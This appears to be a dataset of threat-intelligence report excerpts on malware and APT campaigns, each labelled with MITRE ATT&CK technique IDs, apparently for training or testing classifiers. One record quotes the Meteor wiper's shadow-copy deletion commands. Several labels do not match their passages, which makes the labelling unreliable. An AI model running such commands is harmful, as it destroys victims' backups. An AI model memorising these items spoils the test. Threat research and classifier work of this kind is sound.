{"text1":"FireEye Intelligence has previously reported that APT33 has ties to destructive malware, and they pose a heightened risk to critical infrastructure. This risk is pronounced in the energy sector, which we consistently observe them target. That targeting aligns with Iranian national priorities for economic growth and competitive advantage, especially relating to petrochemical production","labels":"['T1110.003']"}
|
|
{"text1":"Given Lazarus\u2019 use of a wide array of tools and techniques in their operations, it\u2019s reasonable to assume that the group will continue to use ever-evolving tactics in their malicious activities. Overall, an organization will need multilayered security strategies, as Lazarus and other similar groups are experienced cybercriminals who employ different strategies to get past organizational defenses","labels":"['T1189']"}
|
|
{"text1":"After the wiping procedure, the malware tries to delete the shadow copies by running the following commands: vssadmin.exe delete shadows \/all \/quiet and C:\\\\Windows\\\\system32\\\\wbem\\\\wmic.exe shadowcopy delete. Finally, the malware enters an infinite loop where it sleeps based on the is_alive_loop_interval value from the configuration file and writes \"Meteor is still alive","labels":"['T1047']"}
|
|
{"text1":"As can be seen above, the script gathers OS version, a session UID and machine ID, all of which it posts to the server for processing","labels":"['T1082']"}
|
|
{"text1":"According to the public source data, these airlines use services of the same IT service provider. It came to light that the cyberattack on this IT service provider affected 4,500,000 data subjects globally, including data related to Air India's customers. Compromise of Air India's network In mid-February 2021, Group-IB's Threat Intelligence & Attribution system detected infected devices that were part of Air India's computer network. It took the attackers 24 hours and 5 minutes to spread Cobalt Strike beacons to other devices in the airline's network. ColunmTK Timeline Connections with APT41 Group-IB researchers believe with moderate confidence that the ColunmTK campaign was carried out by APT41, a prolific Chinese-speaking nation-state threat actor. According to Group-IB's Threat Intelligence & Attribution system, the threat actor has been active since at least 2007. APT41 is known for stealing digital certificates for its cyber espionage operations. The IP address was also used to host the Cobalt Strike framework and shared an SSL certificate, b3038101fd0e8b11c519f739f12c7e9b60234d3b, with ColunmTK's IP address 185[.]118[.]166[.]66. The file is very similar to one used by APT41 in a different campaign described by FireEye researchers. The files are very similar in the way they launch a DLL file as a service and create keys in the registry","labels":"['T1569.002']"}
|
|
{"text1":"Additionally, the attackers used a genuine code-signing certificate issued to a Cyprus-based company called Hermetica Digital Ltd","labels":"['T1553.002']"}
|
|
{"text1":"Use automated methods, such as scripts, for collecting data (Automated Collection [T1119]) - Capture user input to obtain credentials and collect information (Input Capture [T1056]) - Collect local systems data from a compromised system (Data from Local System [T1005]) - Take screen captures of the desktop (Screen Capture [T1113]) - Collect data stored in the Windows clipboard from users (Clipboard Data [T1115","labels":"['T1005']"}
|
|
{"text1":"A service DLL (loaded by svchost.exe) with a ServiceMain function typically named NetSetupServiceMain - A standard non-Service DLL loaded by rundll32.exe","labels":"['T1558.003']"}
|
|
{"text1":"OSX\/Keydnap uses a Tor2Web proxy for command and control. An installed launch agent, icloudproc, is automatically started by the OS, and listens on 127.0.0.1:9050. As noted by ESET, the main backdoor component (icloudsyncd) uses this proxy for communication purposes: \u201cKeydnap is using the onion.to Tor2Web proxy over HTTPS to report back to its C&C server","labels":"['T1543.001']"}
|
|
{"text1":"Communication over DNS tunnel with a hardcoded domain name and DGA-generated subdomain - C2 traffic encrypted with RSA-2048 - Custom AES-encrypted storage format used to store configuration, plugins, and harvested data - Unique version number for each sample","labels":"['T1071.004', 'T1027']"}
|
|
{"text1":"Volexity is seeing active in-the-wild exploitation of multiple Microsoft Exchange vulnerabilities used to steal e-mail and compromise networks. In January 2021, through its Network Security Monitoring service, Volexity detected anomalous activity from two of its customers' Microsoft Exchange servers. This vulnerability is remotely exploitable and does not require authentication of any kind, nor does it require any special knowledge or access to a target environment. Additionally, Volexity is providing alternative mitigations that may be used by defenders to assist in securing their Microsoft Exchange instances. This vulnerability has been confirmed to exist within the latest version of Exchange 2016 on a fully patched Windows Server 2016 server. Volexity also confirmed the vulnerability exists in Exchange 2019 but has not tested against a fully patched version, although it believes they are vulnerable. There are two methods to download e-mail with this vulnerability, depending on the way that Microsoft Exchange has been configured. In the case where a single server is being used to provide the Exchange service, Volexity believes the attacker must know the targeted user\u2019s domain security identifier (SID) in order to access their mailbox. Further other notable User-Agent entries tied to tools used for post-exploitation access to webshells. Network Indicators - Attacker IPs . Volexity has observed numerous IP addresses leveraged by the attackers to exploit the vulnerabilities described in this blog","labels":"['T1190']"}
|
|
{"text1":"The analyzed sample of NotPetya encrypts the compromised system\u2019s files with a 128-bit Advanced Encryption Standard (AES) algorithm during runtime. The malware then writes a text file on the \u201cC:\\\u201d drive that includes a static Bitcoin wallet location as well as unique personal installation key intended for the victim to use when making the ransom payment and the user\u2019s Bitcoin wallet ID. NotPetya modifies the master boot record (MBR) to enable encryption of the master file table (MFT) and the original MBR, and then reboots the system. Based on the encryption methods used, it appears unlikely that the files could be restored, even if the attacker received the victim\u2019s unique key and Bitcoin wallet ID","labels":"['T1486']"}
|
|
{"text1":"The campaigns use a TrickBot downloader that is signed and uses an icon to pretend it is a Microsoft Word document. When the user double-clicks the file, they are presented with a decoy message box. To avoid suspicion, the decoy message suggests the user should update Microsoft Word or open the file from another computer","labels":"['T1555.003']"}
|
|
{"text1":"To achieve privilege escalation within the environment, FIN6 utilized a named pipe impersonation technique included within the Metasploit framework that allows for SYSTEM-level privilege escalation","labels":"['T1134']"}
|
|
{"text1":"It then calls the API EnumWindows() function to enumerate\u00a0all windows from the victim\u2019s system. Its EnumFunc() callback function collects all windows titles and then adds a 14H long random string prefix. One mixed windows title looks like this: \u201c{14H long random string}+windows title\u201d. All the mixed windows titles are added into a string list box control","labels":"['T1010']"}
|
|
{"text1":"As my analysis in the previous blog showed, Agent Tesla is a spyware. It monitors and collects the victim\u2019s keyboard inputs, system clipboard, screen shots of the victim\u2019s screen, as well as collects credentials of a variety of installed software. So far, through my quick analysis, this version is similar to the older one","labels":"['T1082']"}
|
|
{"text1":"We\u2019ve seen the adversary staging data on a remote system or on the local system. Most of the time the data is compressed and copied at the same time. Only a handful of times the adversary copies the data first before compressing (archive collected data) and exfiltrating it. The adversary compresses and encrypts the data by using WinRAR from the command-line","labels":"['T1124']"}
|
|
{"text1":"A macro in the Microsoft Word document contained the malicious code designed to download and execute additional malicious software on the infected system","labels":"['T1566.001', 'T1566.001']"}
|
|
{"text1":"PACT has reverse engineered the DGA, dynamically analyzed the malware, investigated the Threat Actor\u2019s (TA) web-based infrastructure, and consolidated the results of our analysis into the following report","labels":"['T1070.004']"}
|
|
{"text1":"From September to December 2018 the RTM group sent out more than 11,000 malicious emails. The cybercriminals, however, are not going to stop there, as evidenced by the new malicious campaigns that we track as part of our ongoing threat intelligence activities. Where do we begin our search? Let's start with simple things: we will take the NTUSER.DAT registry file with the latest modification date from the user directory (C:\\Users\\%username%\\), and extract data from it using RegRipper. In general, you do not have to stick to the Sleuth Kit at all; there are more convenient tools like FTK Imager, a free tool, which can be used not only to create forensic images, but also to examine their contents. Let's take a closer look at apg.exe and use PPEE: This looks like TeamViewer and is signed as TeamViewer, so does this mean it indeed is TeamViewer? Judging by the file's size, it has nothing to do with the original msi.dll, so it is clearly DLL Search Order Hijacking. The operating system starts searching for the necessary libraries from the current directory, which means that instead of the legitimate msi.dll, the one located in b7mg81 will be loaded. Another interesting file is TeamViewer.ini: Here is anti-forensics: according to the configuration file, our \"TeamViewer\" did not keep any logs, and was apparently used as a RAT (Remote Access Trojan). Well, not bad. I think we can use the Sleuth Kit again","labels":"['T1574.001']"}
|
|
{"text1":"The attackers orchestrate attacks using batch or PowerShell scripts that are executed, with the help of domain controllers, on any machine the DC can reach. The scripts retrieve the attackers\u2019 payloads using psexec or certutil","labels":"['T1105', 'T1569.002', 'T1059.003']"}
|
|
{"text1":"Note that the browser itself is not hooked. Executing the browser from any other Chrome shortcut link will start and run it normally without the malicious extension, canceling out the malware\u2019s ability to control what the victim does","labels":"['T1547.009']"}
|
|
{"text1":"The Epic backdoors are commanded by a huge network of hacked servers that deliver command and control functionality","labels":"['T1049']"}
|
|
{"text1":"Capture current screen (screenshot) and save screenshot as a JPEG to \"C:\\ProgramData\\tsc\". The contents of the file are subsequently read and sent to the C2. Code to capture a screenshot as bitmap and save to file","labels":"['T1113']"}
|
|
{"text1":"Sodinokibi attempts to encrypt data in a user's directory and delete shadow copy backups to make data recovery more difficult. This vulnerability is easy for attackers to exploit, as anyone with HTTP access to the WebLogic server could carry out an attack. Attackers have been making use of this exploit in the wild since at least April 17. Initial stages of the ransomware attack occurred on April 25, the day before Oracle released their update. The attackers are downloading the Sodinokibi ransomware. In this case, the attackers simply leveraged the Oracle WebLogic vulnerability, causing the affected server to download a copy of the ransomware from attacker-controlled IP addresses 188.166.74[.]218 and 45.55.211[.]79. The 188.166.74[.]218 IP address is also home to a pair of other malicious domains unrelated to this ransomware attack: arg0s-co[.]uk, which is likely a phishing domain, and projectstore[.]guru, a domain with bogus PDF-related Google search results. The other IP, 45.55.211[.]79, hosts a pair of legitimate Chilean domains, and appears to have been infected and repurposed by the attackers. The attackers were ultimately successful at encrypting a number of systems during this incident. Cisco IR Services and Talos observed the attack requests originating from 130.61.54[.]136","labels":"['T1105']"}
|
|
{"text1":"Exploits a kernel privilege escalation vulnerability to gain SYSTEM privileges using CVE-2018-8453. REvil uses Hypertext Transfer Protocol Secure (HTTPS) for communication with its controllers","labels":"['T1071.001']"}
|
|
{"text1":"The attackers dropped Visual Basic and PowerShell scripts in folders that they created under the ProgramData (a hidden folder, by default). The attackers created persistence using Windows\u2019 registry, services and scheduled tasks. This persistence mechanism ensured that the loader scripts would execute either at startup or at predetermined intervals","labels":"['T1053.005', 'T1547.001']"}
|
|
{"text1":"ESET researchers have discovered several previously undocumented post-compromise tools used by the highly active Gamaredon threat group in various malicious campaigns. One tool, a VBA macro targeting Microsoft Outlook, uses the target\u2019s email account to send spearphishing emails to contacts in the victim\u2019s Microsoft Office address book. We also analyzed further Gamaredon tools that have the ability to inject malicious macros and remote templates into existing Office documents","labels":"['T1039', 'T1204.002', 'T1534', 'T1083']"}
|
|
{"text1":"We have identified several implants that leveraged PowerShell, VBS, JS, and dotnet for resilience and persistence. The final stage, however, is a dotnet application that takes several commands such as directory listing, screenshot, compress, upload, etc. It then creates random long string folder names in temp directories to host the collected files per category before compressing, encrypting and uploading to the C2 server","labels":"['T1083']"}
|
|
{"text1":"Initially, cybercriminals used BlackEnergy custom plugins for launching DDoS attacks. BlackEnergy2 was eventually seen downloading more crimeware plugins \u2013 a custom spam plugin and a banking information stealer custom plugin. While another crimeware group continues to use BlackEnergy to launch DDoS attacks, the BE2 APT appears to have used this tool exclusively throughout 2014 at victim sites and included custom plugins and scripts of their own. To be clear, our name for this actor has been the BE2 APT, while it has been called \u201cSandworm Team\u201d also","labels":"['T1082']"}
|
|
{"text1":"dellLemb||> deletes the registry key \\Software\\Microsoft\\Internet Explorer\\notes. EXECPROGAM calls ShellExecute to run the application given in the command. NOVOLEMBRETE creates and stores data sent with the command in the registry key \\Software\\Microsoft\\Internet Explorer\\notes","labels":"['T1070']"}
|
|
{"text1":"Check for Skype connectivity - Download and install Skype - Encoded communication with its C2 - Execute commands sent from the C2 server - Get multifactor authentication settings - Get the currently logged on user and OS version","labels":"['T1132.001']"}
|
|
{"text1":"The fourth-stage wiper starts off by enumerating from A to Z, looking for fixed and remote logical drives in the system. Enumerates logical drives. For each enumeration, it performs a breadth-first search to wipe the files in the logical drive while ignoring files located in the \"%HOMEDRIVE%\\Windows\" directory","labels":"['T1049', 'T1082']"}
|
|
{"text1":"1) The infection chain used in this attack begins with a weaponized link to a Google Drive folder, obfuscated using the goo.gl link shortening service. 2) When contacted, the Google Drive link retrieves a zip file, which contains a .lnk file obfuscated as a .pdf file using the double extension trick. 3) This file requires the target to attempt to open the .lnk file, which redirects the user to a Windows Scripting Component (.wsc) file, hosted on an adversary-controlled microblogging page. MUSTANG PANDA has previously used the observed microblogging site to host malicious PowerShell scripts and Microsoft Office documents in targeted attacks on Mongolia-focused NGOs. 4) The .lnk file uses an embedded VBScript component to retrieve a decoy PDF file and a PowerShell script from the adversary-controlled web page. 6) The Cobalt Strike Beacon implant beacons to the command-and-control (C2) IP address, which is used to remotely control the implant","labels":"['T1036.007']"}
|
|
{"text1":"WMIC (wmic.exe) was used to create a remote command prompt instance (cmd.exe), which then executed the PowerShell code. The PowerShell command created two variables and attempted to download and execute the payload from one of FIN8\u2019s Command and Control (C&C) servers. This download was blocked by Bitdefender \u2013 below description is based on interpretation of variables discovered in our previous analysis of FIN8 operations","labels":"['T1059.001', 'T1105', 'T1059.003']"}
|
|
{"text1":"mshlpweb.dll is a loader that uses a known token impersonation technique to elevate permissions and execute install.bat with high privileges. This process runs as a high-integrity process by default, since it's set to auto-elevate within its manifest","labels":"['T1134.002']"}
|
|
{"text1":"After downloading the executable payload, the secondary VBScript runs the following command on the command line (T1059) to kill any existing msiexec.exe process instances and use the ping application to sleep for two seconds before using the legitimate msiexec.exe application (T1218) to launch the downloaded PlayerVLC.msi file","labels":"['T1105']"}
|
|
{"text1":"In all stages of the attack, the actor demonstrated a deep knowledge of software tools, deployments, security software and systems common in networks, and techniques frequently used by incident response teams. This knowledge is reflected in the actor\u2019s operational decisions, from the choice of command-and-control (C2) infrastructure to the naming of scheduled tasks used to maintain persistence","labels":"['T1053.005']"}
|
|
{"text1":"Once elevated, the ransomware will write a copy of a random file from System32 to the %APPDATA% directory. The newly copied file will have a random and hidden filename. This process allows for the ransomware to copy itself into the file by way of an alternate data stream (ADS","labels":"['T1564.004']"}
|
|
{"text1":"The Trojan sends an email to sahro.bella7[at]post.cz with sysscr.ops as the attachment, the string SCreen within the body and a subject with the unique system identifier via SMTPS from one of three previously used accounts. If the actor wishes to download an additional payload to the compromised host, they will respond by sending emails in the following steps. 3) The actor sends an email to trala.cosh2[at]post.cz with the unique system identifier as a subject with a secondary email account and credentials in ASCII hexadecimal format within the message body. This secondary email account is unknown at this time, so we will refer to it as \"secondary email account\" in future steps. 4) The actor sends an email to the secondary email account with the unique system identifier as a subject with a secondary payload attached with a filename of txt. Cannon opens the email with the correct subject and decodes the hexadecimal data in the body of the message to obtain the secondary email account. 7) The actor sends an email to\u00a0trala.cosh2[at]post.cz with the unique system identifier as a subject with a file path that the Cannon Trojan will use to save the secondary payload. 8) Cannon logs into the secondary email account via POP3S looking for emails with a subject that matches the unique system identifier. Cannon opens the email with the correct subject and decodes the hexadecimal data in the body of the message to obtain the file path that it will use to move the downloaded auddevc.txt file. 12) Cannon moves the downloaded file to the specified path","labels":"['T1105']"}
|
|
{"text1":"Another relationship we have mentioned repeatedly is the use of the SYSCON malware family. This particular malware family was first reported in October 2017 and has been observed delivering decoy documents pertaining to North Korea. The malware is generally unsophisticated, making use of remote FTP servers for C2 communication","labels":"['T1071.002']"}
|
|
{"text1":"It also conducts basic victim profiling activity, collecting the computer name, running process IDs, %TEMP% directory path and version of Internet Explorer. It communicates encoded system information to a single hard coded command and control (C2) server, using the system\u2019s default User-Agent string. BUGJUICE is a backdoor that is executed by launching a benign file and then hijacking the search order to load a malicious dll into it. BUGJUICE defaults to TCP using a custom binary protocol to communicate with the C2, but can also use HTTP and HTTPs if directed by the C2. It has the capability to find files, enumerate drives, exfiltrate data, take screenshots and provide a reverse shell. SNUGRIDE is a backdoor that communicates with its C2 server through HTTP requests","labels":"['T1071.001']"}
|
|
{"text1":"This backdoor adds the following registry entries to enable its automatic execution at every system startup","labels":"['T1547.001', 'T1547.001']"}
|
|
{"text1":"Cisco Talos has discovered a new malware campaign based on a previously unknown family we're calling \"PoetRAT. The droppers are Microsoft Word documents that deploy a Python-based remote access trojan (RAT). We named this malware PoetRAT due to the various references to William Shakespeare, an English poet and playwright. The RAT has all the standard features of this kind of malware, providing full control of the compromised system to the operation. For exfiltration, it uses FTP, which denotes an intention to transfer large amounts of data. The campaign shows us that the operators manually pushed additional tools when they needed them on the compromised systems. We will describe a couple of these tools. The most interesting is a tool used to monitor the hard disk and exfiltrate data automatically","labels":"['T1056.001']"}
|
|
{"text1":"The batch-files appear to be used to load the Cobalt Strike beacon, but also to perform discovery commands on the compromised system","labels":"['T1059.003']"}
|
|
{"text1":"The actor has distributed its dropper embedded in an archive file (\uc678\uad50\ubd80 \uac00\ud310 2021-05-07.zip) as an attachment through spearphishing emails. The archive file contains a JavaScript file (\uc678\uad50\ubd80 \uac00\ud310 2021-05-07.pdf.jse) which pretends to be a PDF file that contains two Base64 encoded blobs. The first one is the content of the decoy PDF file in Base64 format and the other one contains the AppleSeed payload also in Base64 format (encoded twice","labels":"['T1204.002', 'T1027']"}
|
|
{"text1":"The Daum variants of Brave Prince gather information from the system and save it to the file PI_00.dat. The type of data this implant gathers from the victim\u2019s system","labels":"['T1016', 'T1012']"}
|
|
{"text1":"Collected files under the preliminary collection directory will be compressed using a WinRAR instance that the Ramsay Installer drops. This compressed archive will be saved within the preliminary collection directory and then generate a Ramsay container artifact","labels":"['T1083', 'T1560.001']"}
|
|
{"text1":"As discussed in the delivery document\u00a0analysis above,\u00a0depending on the OS architecture either of the embedded\u00a0KerrDown\u00a0DLLs\u00a0will be dropped in the victim machine. The\u00a0DLL\u00a0is dropped in the directory location \u2018Users\\Administrator\\AppData\\Roaming\\\u2019\u00a0as \u2018main_background.png\u2019.\u00a0The DLL retrieves the payload from\u00a0the\u00a0URL, decrypts it by using DES algorithm and\u00a0execute it\u00a0in\u00a0the\u00a0memory. Therefore, it is observed that only the\u00a0KerrDown\u00a0DLL\u00a0downloader is saved in the system and the payload directly gets executed in the memory without being written in the system. Table\u00a01\u00a0shows the\u00a0URL\u00a0the downloader will attempt to download the payload from depending on the\u00a0OS architecture of the victim machine","labels":"['T1105']"}
|
|
{"text1":"To exploit the Log4j vulnerability (CVE-2021-44228), the attackers chose one of the publicly available open-source JNDI Exploit Kits, since removed from GitHub due to its enormous popularity following the vulnerability emergence. There are multiple analysis papers that explain how the vulnerability can be exploited, so we will skip the details of the actual exploitation step","labels":"['T1190']"}
|
|
{"text1":"List of installed antivirus products - OS version - Username - Computer name - Whether any of the following software is installed: Diebold Warsaw GAS Tecnologia (an application to protect access to online banking) Trusteer Several Latin American banking applications - Diebold Warsaw GAS Tecnologia (an application to protect access to online banking) - Trusteer - Several Latin American banking applications","labels":"['T1518.001']"}
|
|
{"text1":"All further information sent to the C&C is encrypted with a public key framework, making decryption impossible. The commands from the C&C are encrypted in a simpler manner and can be decrypted if intercepted because the secret key is hardcoded in the malware","labels":"['T1573.001']"}
|
|
{"text1":"HELLOKITTY is written in C++, but reimplements a significant portion of DEATHRANSOM's functionality using similar loop operations and thread pooling via QueueUserWorkItem. The code structure to enumerate network resources, logical drives, and perform file encryption is very similar. Additionally, HELLOKITTY and DEATHRANSOM share very similar functions to check for the completion status of their encryption threads before exiting","labels":"['T1082', 'T1135']"}
|
|
{"text1":"In our tests, running Valak from a U.S. location on a vulnerable Windows 10 host returned a banking Trojan called IcedID as the follow-up malware. In one case, we saw both IcedID and NetSupport Manager RAT-based malware delivered as follow-up malware on a Windows 7 host from June 2020","labels":"['T1105']"}
|
|
{"text1":"AIRBREAK: a JavaScript-based backdoor also reported as \u201cOrz\u201d that retrieves commands from hidden strings in compromised webpages and actor controlled profiles on legitimate services. BADFLICK: a backdoor that is capable of modifying the file system, generating a reverse shell, and modifying its command and control (C2) configuration. HOMEFRY: a 64-bit Windows password dumper\/cracker that has previously been used in conjunction with AIRBREAK and BADFLICK backdoors. The malware accepts up to two arguments at the command line: one to display cleartext credentials for each login session, and a second to display cleartext credentials, NTLM hashes, and malware version for each login session. MURKYTOP: a command-line reconnaissance tool","labels":"['T1018', 'T1135', 'T1046', 'T1087.001']"}
|
|
{"text1":"Use of obfuscated shellcode executed via PowerShell to download a \"reverse_tcp\" payload from Metasploit onto victim systems","labels":"['T1059.001']"}
|
|
{"text1":"At the time of writing, two VBS files have been seen pushed to the target computer by VBShower","labels":"['T1105']"}
|
|
{"text1":"Another difference in the network traffic generated from the malware is that the encoded proxy information has been added in the URL query values during the C2 communication. Table 4 shows the parameters sent to C2 server from the backdoor in the newer versions","labels":"['T1090.002']"}
|
|
{"text1":"Filename: impku.dat:schemas File size: 608854 bytes MD5 hash: b774f39d31c32da0f6a5fb5d0e6d2892 SHA1 hash: ae3ff39c2a7266132e0af016a48b97d565463d90 Notes: Alternate data stream (ADS) PNG file with the PowerDuke backdoor component hidden and encrypted within using Tiny Encryption Algorithm (TEA","labels":"['T1564.004']"}
|
|
{"text1":"After the victim clicks the Enable Content button, the macro commands are executed and invoke the Windows OS process msiexec.exe. This process is the Windows Installer, a software component and application programming interface of Microsoft Windows used for the installation, maintenance, and removal of software","labels":"['T1218.007']"}
|
|
{"text1":"This turned out to be the best solution, as the Cobalt group set up a controlled botnet in the bank's network which was very difficult to track and even harder to stop. In october 2016 Group-IB published the report about the Cobalt group. Network penetration In all cases investigated by Group-IB, the Cobalt group used a set of spear phishing emails to gain initial access to the corporate infrastructure. For organizations that perform timely updates of their systems and adhere to strict security policies, the Cobalt group employs another method to deliver malicious code through emails with Word documents containing a malicious macro. Provision of the malware survivability The Cobalt group uses different methods to ensure malware survivability on corporate networks. Aside from that, startup is performed by loading Cobalt Strike into the main memory without saving to the file system. Bypassing network security Cobalt Strike allows users to install two types of modules: HTTP\/HTTPS\/DNS modules and SMB modules. Use of standard tools Cobalt Strike is publicly accessible, and can be downloaded in order to learn and create detection rules on the network. To prevent this threat, the company should configure filter rules to detect the above-mentioned tools on the corporate network. Conclusion After infecting one computer on an organization's network, the Cobalt group analyzes the programs used on it and search for critical servers and the computers from which they are accessed","labels":"['T1046']"}
|
|
{"text1":"Initially, cybercriminals used BlackEnergy custom plugins for launching DDoS attacks. While another crimeware group continues to use BlackEnergy to launch DDoS attacks, the BE2 APT appears to have used this tool exclusively throughout 2014 at victim sites and included custom plugins and scripts of their own. To be clear, our name for this actor has been the BE2 APT, while it has been called \u201cSandworm Team\u201d also","labels":"['T1555.003']"}
|
|
{"text1":"All of the bait documents are MHTML ones with malicious macro embedded and the .doc suffix to bypass detection. Below is an example of bait document captured by 360 Threat Intelligence Center in February 2019","labels":"['T1059.005']"}
|
|
{"text1":"2) The additional commands and execution objects are executed in the machine that has been compromised in the isolated network","labels":"['T1204.002']"}
|
|
{"text1":"Beacon: a backdoor that is commercially available as part of the Cobalt Strike software platform, commonly used for pen-testing network environments. The malware supports several capabilities, such as injecting and executing arbitrary code, uploading and downloading files, and executing shell commands. BLACKCOFFEE: a backdoor that obfuscates its communications as normal traffic to legitimate websites such as Github and Microsoft's Technet portal. Used by APT17 and other Chinese cyber espionage operators","labels":"['T1102.001']"}
|
|
{"text1":"Sibot is a dual-purpose malware implemented in VBScript. It is designed to achieve persistence on the infected machine then download and execute a payload from a remote C2 server. The VBScript is then run via a scheduled task","labels":"['T1053.005']"}
|
|
{"text1":"The initial infection vector of this campaign is a Microsoft Office Excel Worksheet with an Office macro that uses the mshta.exe Windows executable to run scripts, which are embedded in the HTML of a specially-crafted blogspot.com page. The page, 29[.]html, contains two distinct sections of scripts. The scripts create scheduled tasks and also retrieve, decode, and execute a copy of Revenge RAT","labels":"['T1218.005']"}
|
|
{"text1":"BRONZE UNION has also leveraged various web shells to collect and stage data for exfiltration. In one instance, the threat actor gained remote access to a high-value system in a compromised network, ran quser.exe to identify existing RDP sessions on the device, immediately ran a command to compile a RAR archive that specified file types the threat actor did not want, and used a password to encrypt the archive","labels":"['T1560.002', 'T1074.001', 'T1049']"}
|
|
{"text1":"The loaded DLL retrieves the path to the Warzone malicious file from HKCU\\SOFTWARE\\_rptls\\Install, iterates through running processes and kills the Warzone process if it already exists. Then it runs the Warzone executable again, this time with Admin privileges","labels":"['T1055']"}
|
|
{"text1":"KillDisk has a numeric parameter that denotes the number of minutes (15 being the default) it will wait before it shuts down the affected machine. To try to reboot the machine, it will try to terminate these processes","labels":"['T1489']"}
|
|
{"text1":"The backdoor determines its C2 server using a Domain Generation Algorithm (DGA) to construct and resolve a subdomain of avsvmcloud[.]com. The Update method is responsible for initializing cryptographic helpers for the generation of these random C2 subdomains. Subdomains are generated by concatenating a victim userId with a reversible encoding of the victims local machine domain name. The attacker likely utilizes the DGA subdomain to vary the DNS response to victims as a means to control the targeting of the malware. These subdomains are concatenated with one of the following to create the hostname to resolve","labels":"['T1568']"}
|
|
{"text1":"Appendix A \u2013 PLAINTEE older variant Older variants of PLAINTEE can be identified via the unique mutex created during runtime. At least three variants of PLAINTEE have been identified to date, however, the following two samples have additional unique differences","labels":"['T1548.002']"}
|
|
{"text1":"The fourth spear phishing email of the campaign was sent on January 23, 2018 to a range of targets working for Tibetan NGOs, media groups, and the CTA. The message appeared to be sent from the Director of the Tibet Museum, which is an official museum of the CTA. Attached to the email were RTF and PPSX messages that claimed to present information about the National Museum of Tibet (see Figure 5). These files contained the CVE-2017-11882 and TSSL Suite infection chain","labels":"['T1566.001']"}
|
|
{"text1":"The threat actors used Windows\u2019 scheduled task and batch scripts to execute \u201cscr.exe\u201d and collect additional information from hosts on the network. The tool \u201cscr.exe\u201d is a screenshot utility that the threat actor used to capture the screen of systems across the network. The MD5 hash of \u201cscr.exe\u201d matched the MD5 of ScreenUtil, as reported in the Symantec Dragonfly 2.0 report","labels":"['T1059.003', 'T1113']"}
|
|
{"text1":"Finally, the script stores the encrypted payload in the Windows registry. Note that the attackers seem to use a different registry location per organization. Thus, it is not a useful indicator to detect similar intrusions","labels":"['T1112']"}
|
|
{"text1":"HyperStack uses named pipes to execute remote procedure calls (RPC) from the controller to the device hosting the HyperStack client. To move laterally, the implant tries to connect to another remote device\u2019s IPC$ share, either using a null session or default credentials. IPC$ is a share that facilitates inter-process communication (IPC) by exposing named pipes to write to or read from. If the implant\u2019s connection to the IPC$ is successful, the implant can forward RPC commands from the controller to the remote device, and likely has the capability to copy itself onto the remote device","labels":"['T1559', 'T1078.001']"}
|
|
{"text1":"At the time of discovery TEARDROP was a novel concoction: never-before-seen, possibly even tailor-made for this attack. TEARDROP runs in-memory but it does register a Windows service, which involves editing the registry","labels":"['T1112']"}
|
|
{"text1":"Hooking module \u2013 hooks a hardcoded set of WinAPI and (if they exist) Mozilla DLL Hooking is used to perform web injects, sniff traffic and keyboard data and even prevent DNS resolution of certain domains. Hooking works in the following way: QakBot injects a hooking module into the appropriate process, the module finds functions from the hardcoded set and modifies the functions so they jump to custom code","labels":"['T1055']"}
|
|
{"text1":"Curiously, the same private session key is also encrypted with another public key hardcoded into the body of the Trojan, regardless of the configuration. It turns out that someone who knows the private key corresponding to the public skeleton key is able to decrypt the victim\u2019s files, even without the private key for sub_key. It seems like the Trojan developers built a loophole into the algorithm allowing them to decrypt files behind the distributors\u2019 back","labels":"['T1486']"}
|
|
{"text1":"The APT group has used web hosting credentials\u2014stolen from victims outside of their usual targets\u2014to host their malicious scripts and tools. Kimsuky likely obtained the credentials from the victims via spearphishing and credential harvesting scripts. On the victim domains, they have created subdomains mimicking legitimate sites and services they are spoofing, such as Google or Yahoo mail. 14] - Kimsuky has also sent benign emails to targets, which were possibly intended to build trust in advance of a follow-on email with a malicious attachment or link. Posing as South Korean reporters, Kimsuky exchanged several benign interview-themed emails with their intended target to ostensibly arrange an interview date and possibly build rapport. The APT group invited the targets to a Skype interview on the topic of inter-Korean issues and denuclearization negotiations on the Korean Peninsula. Posing as South Korean reporters, Kimsuky exchanged several benign interview-themed emails with their intended target to ostensibly arrange an interview date and possibly build rapport. After a recipient agreed to an interview, Kimsuky sent a subsequent email with a malicious document, either as an attachment or as a Google Drive link within the body. The document usually contained a variant of BabyShark malware (see the Execution section for information on BabyShark). When the date of the interview drew near, Kimsuky sent an email canceling the interview. Kimsuky tailors its spearphishing and social engineering approaches to use topics relevant to the target, such as COVID-19, the North Korean nuclear program, or media interviews","labels":"['T1583.001']"}
|
|
{"text1":"In the newer attack flows we observed, we once again found valid Certum certificates were used to sign the Bandook malware executable","labels":"['T1553.002']"}
|
|
{"text1":"The latter does not use libcurl anymore and now uses winhttp to perform all requests to C2. The usage of the HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run registry key has a persistence mechanism that has been replaced by the creation of a service. The C2 path pattern has also changed, we have identified the following paths: ini.php, info.php and parse_ini_file.php, which are no longer random nor animal named based","labels":"['T1547.001']"}
|
|
{"text1":"For the first time, the Bisonal developers decided to use a packer: MPRESS. The Bisonal string also disappears from the binary however the workflow of the malware stays the same and some features are copy\/pasted from the previous Bisonal variant","labels":"['T1027.002']"}
|
|
{"text1":"Throughout the spear-phishing campaign, the threat actors used email attachments to leverage legitimate Microsoft Office functions for retrieving a document from a remote server using the Server Message Block (SMB) protocol. Note: transfer of credentials can occur even if the file is not retrieved. After obtaining a credential hash, the threat actors can use password-cracking techniques to obtain the plaintext password. With valid credentials, the threat actors are able to masquerade as authorized users in environments that use single-factor authentication","labels":"['T1078']"}
|
|
{"text1":"The emails first originated from a spoofed sender that impersonated a Meetings Services Assistant at the United Nations General Assembly Secretariat. The threat actor achieved this impersonation by utilizing the legitimate email marketing service SMTP2Go, which allows users to alter the envelope sender field while using a unique sender address generated by the service","labels":"['T1585.002']"}
|
|
{"text1":"The new spear-phishing docs used by MuddyWater rely on social engineering to persuade users to enable macros. The attackers rely on a range of compromised hosts to deliver their attacks","labels":"['T1566.001']"}
|
|
{"text1":"FANCY BEAR adversary used different tradecraft, deploying X-Agent malware with capabilities to do remote command execution, file transmission and keylogging","labels":"['T1105']"}
|
|
{"text1":"The next program sent to victims enumerates all the drives on the infected system and executes the following command on them","labels":"['T1083']"}
|
|
{"text1":"Once explorer.exe is running, the service configures the environment and executes the C2 contact module: winprint32.exe. This module is responsible for launching the document search module, contact the C2 and exfiltrate the collected documents","labels":"['T1020', 'T1041']"}
|
|
